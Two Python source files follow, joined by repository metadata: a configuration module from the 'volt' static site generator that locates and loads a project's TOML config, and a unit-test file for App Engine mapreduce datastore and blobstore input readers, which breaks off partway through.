"""Configuration handling."""
# Copyright (c) 2012-2022 Wibowo Arindrarto <contact@arindrarto.dev>
# SPDX-License-Identifier: BSD-3-Clause
import os
from collections import UserDict
from functools import cached_property
from pathlib import Path
from typing import cast, Any, Dict, Iterable, Literal, Optional
import tomlkit
from . import constants, error as err
__all__ = ["Config"]
class Config(UserDict):
"""Container for site-level configuration values."""
@classmethod
def from_within_project_dir(
cls,
invoc_dir: Path,
start_lookup_dir: Path,
config_file_name: str = constants.CONFIG_FILE_NAME,
**kwargs: Any,
) -> Optional["Config"]:
"""Create an instance from within a project directory.
This method performs an upward traversal from the given start directory
to look for a config file and load it.
:param invoc_dir: Path to invocation directory.
:param start_lookup_dir: Path to the directory from which the project
directory lookup should start.
:param config_file_name: Name of file containing the configuration values.
"""
project_dir = _find_dir_containing(config_file_name, start_lookup_dir)
if project_dir is None:
return None
return cls.from_file_name(
invoc_dir=invoc_dir,
project_dir=project_dir.resolve(),
config_file_name=config_file_name,
**kwargs,
)
@classmethod
def from_file_name(
cls,
invoc_dir: Path,
project_dir: Path,
config_file_name: str,
**kwargs: Any,
) -> "Config":
"""Create a site configuration from a Volt config file.
:param invoc_dir: Path to the invocation directory.
:param project_dir: Path to the project working directory.
:param config_file_name: Name of file containing the configuration values.
:returns: A site config instance.
:raises ~err.VoltConfigError: when validation fails.
"""
config_path = project_dir / config_file_name
with config_path.open() as src:
user_conf = cast(Dict[str, Any], tomlkit.load(src))
return cls(
invoc_dir=invoc_dir,
project_dir=project_dir,
user_conf=user_conf,
config_path=config_path,
**kwargs,
)
def __init__(
self,
invoc_dir: Path,
project_dir: Path,
with_drafts: bool = False,
target_dir_name: str = constants.PROJECT_TARGET_DIR_NAME,
sources_dir_name: str = constants.PROJECT_SOURCES_DIR_NAME,
themes_dir_name: str = constants.SITE_THEMES_DIR_NAME,
static_dir_name: str = constants.PROJECT_STATIC_DIR_NAME,
drafts_dir_name: str = constants.PROJECT_DRAFTS_DIR_NAME,
extension_dir_name: str = constants.PROJECT_EXTENSION_DIR_NAME,
xcmd_file_name: str = constants.XCMD_FILE_NAME,
xcmd_mod_name: str = constants.PROJECT_CLI_MOD_QUAL_NAME,
hooks_file_name: str = constants.HOOKS_FILE_NAME,
hooks_mod_name: str = constants.PROJECT_HOOKS_MOD_QUAL_NAME,
config_path: Optional[Path] = None,
user_conf: Optional[dict] = None,
slug_replacements: Iterable[Iterable[str]] = constants.SLUG_REPLACEMENTS,
**kwargs: Any,
) -> None:
"""Initialize a site-level configuration."""
uc = user_conf or {}
site_config = uc.pop("site", {})
self._name: str = site_config.pop("name", "")
self._url: str = site_config.pop("url", "")
self._slug_replacements: Iterable[Iterable[str]] = (
site_config.pop("slug_replacements", None) or slug_replacements
)
theme_config = uc.pop("theme", {}) or {}
self._theme_name = theme_config.pop("name", None) or None
self._theme_overrides = theme_config
super().__init__(site_config, **kwargs)
self._invoc_dir = invoc_dir
self._project_dir = project_dir
self._target_dir = project_dir / target_dir_name
self._sources_dir = self._project_dir / sources_dir_name
self._themes_dir = self._project_dir / themes_dir_name
self._extension_dir = self._project_dir / extension_dir_name
self._drafts_dir_name = drafts_dir_name
self._static_dir = self._project_dir / static_dir_name
self._xcmd_module_path = self._extension_dir / xcmd_file_name
self._xcmd_module_name = xcmd_mod_name
self._hooks_module_path = self._extension_dir / hooks_file_name
self._hooks_module_name = hooks_mod_name
self._config_path = config_path
self._with_drafts = with_drafts
self._server_run_path = project_dir / constants.SERVER_RUN_FILE_NAME
@property
def name(self) -> str:
"""Name of the site."""
return self._name
@property
def url(self) -> str:
"""URL of the site."""
return self._url
@property
def theme_name(self) -> Optional[str]:
"""Name of theme in use."""
return self._theme_name
@property
def theme_overrides(self) -> dict:
"""Site-level theme overrides."""
return self._theme_overrides
@property
def slug_replacements(self) -> Iterable[Iterable[str]]:
"""Slug replacements rules."""
return self._slug_replacements
@property
def project_dir(self) -> Path:
"""Path to the project root directory."""
return self._project_dir
@cached_property
def project_dir_rel(self) -> Path:
"""Path to the project directory, relative from invocation directory."""
rel = self.invoc_dir.relative_to(self.project_dir)
return Path("/".join(("..",) * len(rel.parts)))
@property
def invoc_dir(self) -> Path:
"""Path to the invocation directory."""
return self._invoc_dir
@property
def target_dir(self) -> Path:
"""Path to the site output directory."""
return self._target_dir
@property
def sources_dir(self) -> Path:
"""Path to the site source contents."""
return self._sources_dir
@property
def themes_dir(self) -> Path:
"""Path to the site themes directory."""
return self._themes_dir
@property
def drafts_dir_name(self) -> str:
"""Name of the drafts directory."""
return self._drafts_dir_name
@property
def static_dir(self) -> Path:
"""Path to the site source static files."""
return self._static_dir
@cached_property
def num_common_parts(self) -> int:
return len(self.project_dir.parts) + 1
@property
def xcmd_module_path(self) -> Path:
"""Path to a custom CLI extension."""
return self._xcmd_module_path
@property
def xcmd_module_name(self) -> str:
"""Module name for CLI extensions."""
return self._xcmd_module_name
@property
def hooks_module_path(self) -> Path:
"""Path to a custom hooks extension."""
return self._hooks_module_path
@property
def hooks_module_name(self) -> str:
"""Module name for hooks."""
return self._hooks_module_name
@property
def with_drafts(self) -> bool:
"""Whether to publish draft contents or not."""
return self._with_drafts
@property
def in_docker(self) -> bool:
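"""Whether the current process is running inside a Docker container."""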
return os.path.exists("/.dockerenv")
def reload(
self,
drafts: Optional[bool] = None,
config_file_name: str = constants.CONFIG_FILE_NAME,
) -> "Config":
"""Reloads the config file."""
if self._config_path is None:
raise err.VoltResourceError("could not reload non-file config")
reloaded_drafts = drafts if drafts is not None else self.with_drafts
return self.__class__.from_file_name(
invoc_dir=self.invoc_dir,
project_dir=self.project_dir,
config_file_name=config_file_name,
with_drafts=reloaded_drafts,
)
def _set_drafts(self, value: Optional[bool]) -> None:
if value is not None:
self._with_drafts = value
return None
_VCS = Literal["git"]
_ExcStyle = Literal["pretty", "plain"]
# NOTE: Not context vars because our watchers and server are thread-based
# without any clean ways of propagating the contexts.
_use_color: bool = True
_exc_style: _ExcStyle = "pretty"
def _get_use_color() -> bool:
global _use_color
return _use_color
def _set_use_color(value: bool) -> bool:
global _use_color
cur = _use_color
_use_color = value
return cur
def _get_exc_style() -> _ExcStyle:
global _exc_style
return _exc_style
def _set_exc_style(value: _ExcStyle) -> _ExcStyle:
global _exc_style
cur = _exc_style
_exc_style = value
return cur
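# A brief sketch of the save-and-restore pattern these setters enable; the
# function name, temporary values, and placeholder body are illustrative only.
def _example_toggle_output_style() -> None:
    prev_color = _set_use_color(False)
    prev_style = _set_exc_style("plain")
    try:
        ...  # run something that should emit plain, uncolored output
    finally:
        _set_use_color(prev_color)
        _set_exc_style(prev_style)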
def _find_dir_containing(file_name: str, start: Path) -> Optional[Path]:
"""Find the directory containing the filename.
Directory lookup is performed from the given start directory up until the
root (`/`) directory.
:param file_name: The file name that should be present in the directory.
:param start: The path from which lookup starts.
:returns: The path to the directory that contains the filename or None if
no such path can be found.
"""
cur = Path(start).expanduser().resolve()
while cur != cur.parent:
if cur.joinpath(file_name).exists():
return cur
cur = cur.parent
return None
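# A minimal usage sketch, assuming this module is importable as ``volt.config``
# and that a file named by ``constants.CONFIG_FILE_NAME`` exists in or above
# the starting directory; the printed attributes are illustrative.
if __name__ == "__main__":
    _cwd = Path.cwd()
    _config = Config.from_within_project_dir(invoc_dir=_cwd, start_lookup_dir=_cwd)
    if _config is None:
        print(f"no project config found in or above {_cwd}")
    else:
        print(f"project dir: {_config.project_dir}")
        print(f"target dir:  {_config.target_dir}")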
|
{
"content_hash": "474de49c2ff0581273d371c4c5451674",
"timestamp": "",
"source": "github",
"line_count": 313,
"max_line_length": 82,
"avg_line_length": 31.166134185303516,
"alnum_prop": 0.6126089185033317,
"repo_name": "bow/volt",
"id": "d334df6fd55ab8083435fe030ba35a01b66f6b5e",
"size": "9755",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "volt/config.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "1267"
},
{
"name": "Jinja",
"bytes": "883"
},
{
"name": "Makefile",
"bytes": "5475"
},
{
"name": "Python",
"bytes": "124895"
}
],
"symlink_target": ""
}
|
from google.appengine.tools import os_compat # pylint: disable-msg=W0611
import cStringIO
from testlib import mox
import os
import time
import unittest
import zipfile
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import datastore
from google.appengine.api import datastore_file_stub
from google.appengine.api import namespace_manager
from mapreduce.lib import blobstore
from google.appengine.ext import db
from mapreduce.lib import key_range
from mapreduce.lib.blobstore import blobstore as blobstore_internal
from mapreduce import input_readers
from mapreduce import model
class TestJsonType(object):
"""Test class with to_json/from_json methods."""
def __init__(self, size=0):
self.size = size
def to_json(self):
return {"size": self.size}
@classmethod
def from_json(cls, json):
return cls(json["size"])
class TestEntity(db.Model):
"""Test entity class."""
json_property = model.JsonProperty(TestJsonType)
json_property_default_value = model.JsonProperty(
TestJsonType, default=TestJsonType())
ENTITY_KIND = "__main__.TestEntity"
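# A small sketch of the to_json/from_json round trip that JsonProperty relies
# on; the size value below is illustrative.
def _json_round_trip_example():
    original = TestJsonType(size=3)
    as_json = original.to_json()               # {"size": 3}
    restored = TestJsonType.from_json(as_json)
    assert restored.size == original.size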
def key(entity_id, namespace=None):
"""Create a key for TestEntity with specified id.
Used to shorten expected data.
Args:
entity_id: entity id
namespace: optional namespace for the key
Returns:
db.Key instance with specified id for TestEntity.
"""
return db.Key.from_path("TestEntity", entity_id, namespace=namespace)
class DatastoreInputReaderTest(unittest.TestCase):
"""Test Datastore{,Key,Entity}InputReader classes."""
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
os.environ["AUTH_DOMAIN"] = "gmail.com"
self.resetDatastore()
namespace_manager.set_namespace(None)
def resetDatastore(self, require_indexes=False):
self.datastore = datastore_file_stub.DatastoreFileStub(
self.appid, "/dev/null", "/dev/null", require_indexes=require_indexes)
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
apiproxy_stub_map.apiproxy.RegisterStub("datastore_v3", self.datastore)
def split(self, shard_count, namespaces=['']):
"""Generate TestEntity split.
Args:
shard_count: number of shards to split into as int.
namespaces: a list of namespace strings that should be considered in the
mapreduce.
Returns:
list of key_range.KeyRange (not DatastoreInputReader for easier testing).
"""
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
{"entity_kind": ENTITY_KIND,
"namespaces": namespaces},
shard_count)
ds_input_readers = input_readers.DatastoreInputReader.split_input(
mapper_spec)
return [input_reader._key_ranges for input_reader in ds_input_readers]
def testValidate_Passes(self):
"""Test validate function accepts valid parameters."""
params = {
"entity_kind": ENTITY_KIND,
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
input_readers.DatastoreInputReader.validate(mapper_spec)
def testValidate_NoEntityFails(self):
"""Test validate function raises exception with no entity parameter."""
params = {}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadClassFails(self):
"""Test validate function rejects non-matching class parameter."""
params = {}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreKeyInputReader.validate,
mapper_spec)
def testValidate_KeysOnly(self):
"""Test validate function rejects keys_only parameter."""
# Setting keys_only to true is an error.
params = {
"entity_kind": ENTITY_KIND,
"keys_only": "True"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_MissingEntityKind(self):
"""Test validate function fails without an entity kind."""
params = {}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadEntityKind(self):
"""Test validate function rejects bad entity kind."""
# An entity kind that does not resolve to a model class is an error.
params = {
"entity_kind": "foo",
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadBatchSize(self):
"""Test validate function rejects bad entity kind."""
# Setting keys_only to true is an error.
params = {
"entity_kind": ENTITY_KIND,
"batch_size": "xxx"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
params = {
"entity_kind": ENTITY_KIND,
"batch_size": "0"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
params = {
"entity_kind": ENTITY_KIND,
"batch_size": "-1"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_WrongTypeNamespace(self):
"""Tests validate function rejects namespace of incorrect type."""
params = {
"entity_kind": ENTITY_KIND,
"namespaces": None
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_WrongListTypeNamespace(self):
"""Tests validate function rejects namespace list of incorrect type."""
params = {
"entity_kind": ENTITY_KIND,
"namespaces": [1, 2, 3]
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testParameters(self):
"""Test that setting string parameters as they would be passed from a
web interface works.
"""
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace('google')
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace('ibm')
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace(None)
krange = key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True)
params = {}
params["app"] = "blah"
params["batch_size"] = "42"
params["entity_kind"] = ENTITY_KIND
params["namespaces"] = "google,ibm,"
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
reader = input_readers.DatastoreInputReader.split_input(
mapper_spec)
self.assertEquals(input_readers.DatastoreInputReader, reader[0].__class__)
self.assertEquals(42, reader[0]._batch_size)
self.assertEquals(["", "ibm", "google"],
[k.namespace for k in reader[0]._key_ranges])
params["batch_size"] = "24"
params["namespaces"] = ""
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
reader = input_readers.DatastoreInputReader.split_input(
mapper_spec)
self.assertEquals(24, reader[0]._batch_size)
self.assertEquals([""], [k.namespace for k in reader[0]._key_ranges])
# Setting keys_only to false is OK (it's ignored.)
params["keys_only"] = "False"
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
reader = input_readers.DatastoreInputReader.split_input(
mapper_spec)
# But it's totally ignored on the DatastoreKeyInputReader.
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers."
"DatastoreKeyInputReader",
params, 1)
reader = input_readers.DatastoreKeyInputReader.split_input(mapper_spec)
del params["keys_only"]
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers."
"DatastoreKeyInputReader",
params, 1)
reader = input_readers.DatastoreKeyInputReader.split_input(
mapper_spec)
self.assertEquals(input_readers.DatastoreKeyInputReader,
reader[0].__class__)
# Coverage test: DatastoreEntityInputReader
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers."
"DatastoreEntityInputReader",
params, 1)
reader = input_readers.DatastoreEntityInputReader.split_input(mapper_spec)
self.assertEquals(input_readers.DatastoreEntityInputReader,
reader[0].__class__)
def testSplitNoData(self):
"""Empty split should be produced if there's no data in database."""
self.assertEquals(
[[key_range.KeyRange(key_start=None,
key_end=None,
direction='ASC',
include_start=True,
include_end=True)]],
self.split(10))
def testSplitNotEnoughData(self):
"""Splits should not intersect, if there's not enough data for each."""
TestEntity().put()
TestEntity().put()
self.assertEquals([
[key_range.KeyRange(key_start=None,
key_end=key(2),
direction="ASC",
include_start=False,
include_end=False)],
[key_range.KeyRange(key_start=key(2),
key_end=None,
direction="ASC",
include_start=True,
include_end=False,
namespace='')],
],
self.split(4))
def testSplitLotsOfData(self):
"""Test lots of data case."""
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace('google')
for _ in range(0, 40):
TestEntity().put()
namespace_manager.set_namespace(None)
(reader1_key_ranges,
reader2_key_ranges,
reader3_key_ranges,
reader4_key_ranges) = self.split(4, namespaces=["", "google"])
self.assertEquals(
[
key_range.KeyRange(key_start=None,
key_end=key(103, namespace='google'),
direction="ASC",
include_start=False,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=None,
key_end=key(2),
direction="ASC",
include_start=False,
include_end=False),
],
reader1_key_ranges)
self.assertEquals(
[
key_range.KeyRange(key_start=key(103, namespace='google'),
key_end=key(115, namespace='google'),
direction="ASC",
include_start=True,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=key(2),
key_end=key(32),
direction="ASC",
include_start=True,
include_end=False),
],
reader2_key_ranges)
self.assertEquals(
[
key_range.KeyRange(key_start=key(115, namespace='google'),
key_end=key(123, namespace='google'),
direction="ASC",
include_start=True,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=key(32),
key_end=key(59),
direction="ASC",
include_start=True,
include_end=False),
],
reader3_key_ranges)
self.assertEquals(
[
key_range.KeyRange(key_start=key(123, namespace='google'),
key_end=None,
direction="ASC",
include_start=True,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=key(59),
key_end=None,
direction="ASC",
include_start=True,
include_end=False),
],
reader4_key_ranges)
def testGenerator(self):
"""Test DatastoreInputReader as generator."""
expected_entities = []
for _ in range(0, 100):
entity = TestEntity()
entity.put()
expected_entities.append(entity)
namespace_manager.set_namespace('google')
for _ in range(0, 100):
entity = TestEntity()
entity.put()
expected_entities.append(entity)
namespace_manager.set_namespace(None)
kranges = [key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True),
key_range.KeyRange(key_start=key(110, namespace='google'),
key_end=key(150, namespace='google'),
direction="ASC",
include_start=False,
include_end=True,
namespace='google')]
query_range = input_readers.DatastoreInputReader(
ENTITY_KIND, kranges, 50)
entities = []
for entity in query_range:
entities.append(entity)
self.assertEquals(65, len(entities))
# Model instances are not comparable, so we'll compare a serialization.
expected_values = [entity.to_xml() for entity
in expected_entities[25:50] + expected_entities[110:150]]
actual_values = [entity.to_xml() for entity in entities]
self.assertEquals(expected_values, actual_values)
def testEntityGenerator(self):
"""Test DatastoreEntityInputReader."""
expected_entities = []
for _ in range(0, 100):
model_instance = TestEntity()
model_instance.put()
expected_entities.append(model_instance._populate_internal_entity())
namespace_manager.set_namespace('google')
for _ in range(0, 100):
model_instance = TestEntity()
model_instance.put()
expected_entities.append(model_instance._populate_internal_entity())
namespace_manager.set_namespace(None)
kranges = [key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True),
key_range.KeyRange(key_start=key(110, namespace='google'),
key_end=key(150, namespace='google'),
direction="ASC",
include_start=False,
include_end=True,
namespace='google')]
query_range = input_readers.DatastoreEntityInputReader(
ENTITY_KIND, kranges, 50)
entities = []
for entity in query_range:
entities.append(entity)
self.assertEquals(65, len(entities))
self.assertEquals(expected_entities[25:50] +
expected_entities[110:150],
entities)
def testShardDescription(self):
"""Tests the human-visible description of Datastore readers."""
TestEntity().put()
TestEntity().put()
splits = self.split(2)
stringified = [str(s[0]) for s in splits]
self.assertEquals(
["ASC(None to "
"datastore_types.Key.from_path(u'TestEntity', 2, _app=u'testapp')"
")",
"ASC["
"datastore_types.Key.from_path(u'TestEntity', 2, _app=u'testapp')"
" to None)"],
stringified)
class DatastoreKeyInputReaderTest(unittest.TestCase):
"""Tests for DatastoreKeyInputReader."""
def testValidate_Passes(self):
"""Tests validation function even with invalid kind."""
params = {
"entity_kind": "InvalidKind",
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreKeyInputReader",
params, 1)
input_readers.DatastoreKeyInputReader.validate(mapper_spec)
def testGenerator(self):
"""Test generator functionality."""
expected_keys = []
for _ in range(0, 100):
expected_keys.append(TestEntity().put())
namespace_manager.set_namespace('google')
for _ in range(0, 100):
expected_keys.append(TestEntity().put())
namespace_manager.set_namespace(None)
kranges = [key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True),
key_range.KeyRange(key_start=key(110, namespace='google'),
key_end=key(150, namespace='google'),
direction="ASC",
include_start=False,
include_end=True,
namespace='google')]
query_range = input_readers.DatastoreKeyInputReader(
ENTITY_KIND, kranges, 50)
keys = []
for k in query_range:
keys.append(k)
self.assertEquals(65, len(keys))
self.assertEquals(expected_keys[25:50] + expected_keys[110:150], keys)
def testGeneratorNoModelOtherApp(self):
"""Test DatastoreKeyInputReader when raw kind is given, not a Model path."""
OTHER_KIND = "blahblah"
OTHER_APP = "blah"
apiproxy_stub_map.apiproxy.GetStub("datastore_v3").SetTrusted(True)
expected_keys = []
for _ in range(0, 100):
expected_keys.append(datastore.Put(datastore.Entity(OTHER_KIND,
_app=OTHER_APP)))
key_start = db.Key.from_path(OTHER_KIND, 25, _app=OTHER_APP)
key_end = db.Key.from_path(OTHER_KIND, 50, _app=OTHER_APP)
krange = key_range.KeyRange(key_start=key_start, key_end=key_end,
direction="ASC",
include_start=False, include_end=True,
_app=OTHER_APP)
query_range = input_readers.DatastoreKeyInputReader(
OTHER_KIND, [krange],
{"app": OTHER_APP, "batch_size": 50})
keys = []
for key in query_range:
keys.append(key)
self.assertEquals(
key_range.KeyRange(key_start=key, key_end=key_end,
direction="ASC",
include_start=False, include_end=True),
query_range._key_range)
self.assertEquals(25, len(keys))
self.assertEquals(expected_keys[25:50], keys)
class MockBlobInfo(object):
def __init__(self, size):
self.size = size
class BlobstoreLineInputReaderTest(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
self.mox = mox.Mox()
self.original_fetch_data = blobstore.fetch_data
self.mox.StubOutWithMock(blobstore, "BlobKey", use_mock_anything=True)
self.mox.StubOutWithMock(blobstore.BlobInfo, "get", use_mock_anything=True)
def tearDown(self):
self.mox.UnsetStubs()
self.mox.ResetAll()
blobstore.fetch_data = self.original_fetch_data
def initMockedBlobstoreLineReader(self,
initial_position,
num_blocks_read,
eof_read,
end_offset,
buffer_size,
data):
input_readers.BlobstoreLineInputReader._BLOB_BUFFER_SIZE = buffer_size
# Mock out blob key so as to avoid validation.
blob_key_str = "foo"
def fetch_data(blob_key, start, end):
return data[start:end + 1]
blobstore_internal.fetch_data = fetch_data
r = input_readers.BlobstoreLineInputReader(blob_key_str,
initial_position,
initial_position + end_offset)
return r
def assertNextEquals(self, reader, expected_k, expected_v):
k, v = reader.next()
self.assertEquals(expected_k, k)
self.assertEquals(expected_v, v)
def assertDone(self, reader):
self.assertRaises(StopIteration, reader.next)
def testAtStart(self):
"""If we start at position 0, read the first record."""
blob_reader = self.initMockedBlobstoreLineReader(
0, 1, True, 100, 100, "foo\nbar\nfoobar")
self.assertNextEquals(blob_reader, 0, "foo")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
self.assertNextEquals(blob_reader, len("foo\nbar\n"), "foobar")
def testOmitFirst(self):
"""If we start in the middle of a record, start with the next record."""
blob_reader = self.initMockedBlobstoreLineReader(
1, 1, True, 100, 100, "foo\nbar\nfoobar")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
self.assertNextEquals(blob_reader, len("foo\nbar\n"), "foobar")
def testOmitNewline(self):
"""If we start on a newline, start with the record on the next byte."""
blob_reader = self.initMockedBlobstoreLineReader(
3, 1, True, 100, 100, "foo\nbar")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
def testSpanBlocks(self):
"""Test the multi block case."""
blob_reader = self.initMockedBlobstoreLineReader(
0, 4, True, 100, 2, "foo\nbar")
self.assertNextEquals(blob_reader, 0, "foo")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
def testStopAtEnd(self):
"""If we pass end position, then we don't get a record past the end."""
blob_reader = self.initMockedBlobstoreLineReader(
0, 1, False, 1, 100, "foo\nbar")
self.assertNextEquals(blob_reader, 0, "foo")
self.assertDone(blob_reader)
def testDontReturnAnythingIfPassEndBeforeFirst(self):
"""Test end behavior.
If we pass the end position when reading to the first record,
then we don't get a record past the end.
"""
blob_reader = self.initMockedBlobstoreLineReader(
3, 1, False, 0, 100, "foo\nbar")
self.assertDone(blob_reader)
def mockOutBlobInfoSize(self, size, blob_key_str="foo"):
blob_key = "bar" + blob_key_str
blobstore.BlobKey(blob_key_str).AndReturn(blob_key)
blobstore.BlobInfo.get(blob_key).AndReturn(MockBlobInfo(size))
BLOBSTORE_READER_NAME = (
"mapreduce.input_readers.BlobstoreLineInputReader")
def testSplitInput(self):
# TODO(user): Mock out equiv
self.mockOutBlobInfoSize(200)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"]},
"mapper_shard_count": 1})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
self.assertEquals([{"blob_key": "foo",
"initial_position": 0,
"end_position": 200}],
[r.to_json() for r in blob_readers])
self.mox.VerifyAll()
def testSplitInputMultiKey(self):
# TODO(user): Mock out equiv
for i in range(5):
self.mockOutBlobInfoSize(200, "foo%d" % i)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo%d" % i for i in range(5)]},
"mapper_shard_count": 2})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
# Blob readers are built out of a dictionary of blob_keys and thus unsorted.
blob_readers_json = [r.to_json() for r in blob_readers]
blob_readers_json.sort(key=lambda r: r["blob_key"])
self.assertEquals([{"blob_key": "foo%d" % i,
"initial_position": 0,
"end_position": 200} for i in range(5)],
blob_readers_json)
self.mox.VerifyAll()
def testSplitInputMultiSplit(self):
self.mockOutBlobInfoSize(199)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"]},
"mapper_shard_count": 2})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
self.assertEquals(
[{"blob_key": "foo",
"initial_position": 0,
"end_position": 99},
{"blob_key": "foo",
"initial_position": 99,
"end_position": 199}],
[r.to_json() for r in blob_readers])
self.mox.VerifyAll()
def testShardDescription(self):
"""Tests the human-readable shard description."""
self.mockOutBlobInfoSize(199)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"]},
"mapper_shard_count": 2})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
stringified = [str(s) for s in blob_readers]
self.assertEquals(
["blobstore.BlobKey('foo'):[0, 99]",
"blobstore.BlobKey('foo'):[99, 199]"],
stringified)
self.mox.VerifyAll()
def testTooManyKeys(self):
"""Tests when there are too many blobkeys present as input."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"] * 1000},
"mapper_shard_count": 2})
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.BlobstoreLineInputReader.validate,
mapper_spec)
def testNoKeys(self):
"""Tests when there are no blobkeys present as input."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": []},
"mapper_shard_count": 2})
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.BlobstoreLineInputReader.validate,
mapper_spec)
def testInvalidKey(self):
"""Tests when there a blobkeys in the input is invalid."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ['foo', 'nosuchblob']},
"mapper_shard_count": 2})
self.mockOutBlobInfoSize(100, blob_key_str="foo")
blobstore.BlobKey('nosuchblob').AndReturn('nosuchblob')
blobstore.BlobInfo.get('nosuchblob').AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.BlobstoreLineInputReader.validate,
mapper_spec)
self.mox.VerifyAll()
class BlobstoreZipInputReaderTest(unittest.TestCase):
READER_NAME = (
"mapreduce.input_readers.BlobstoreZipInputReader")
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
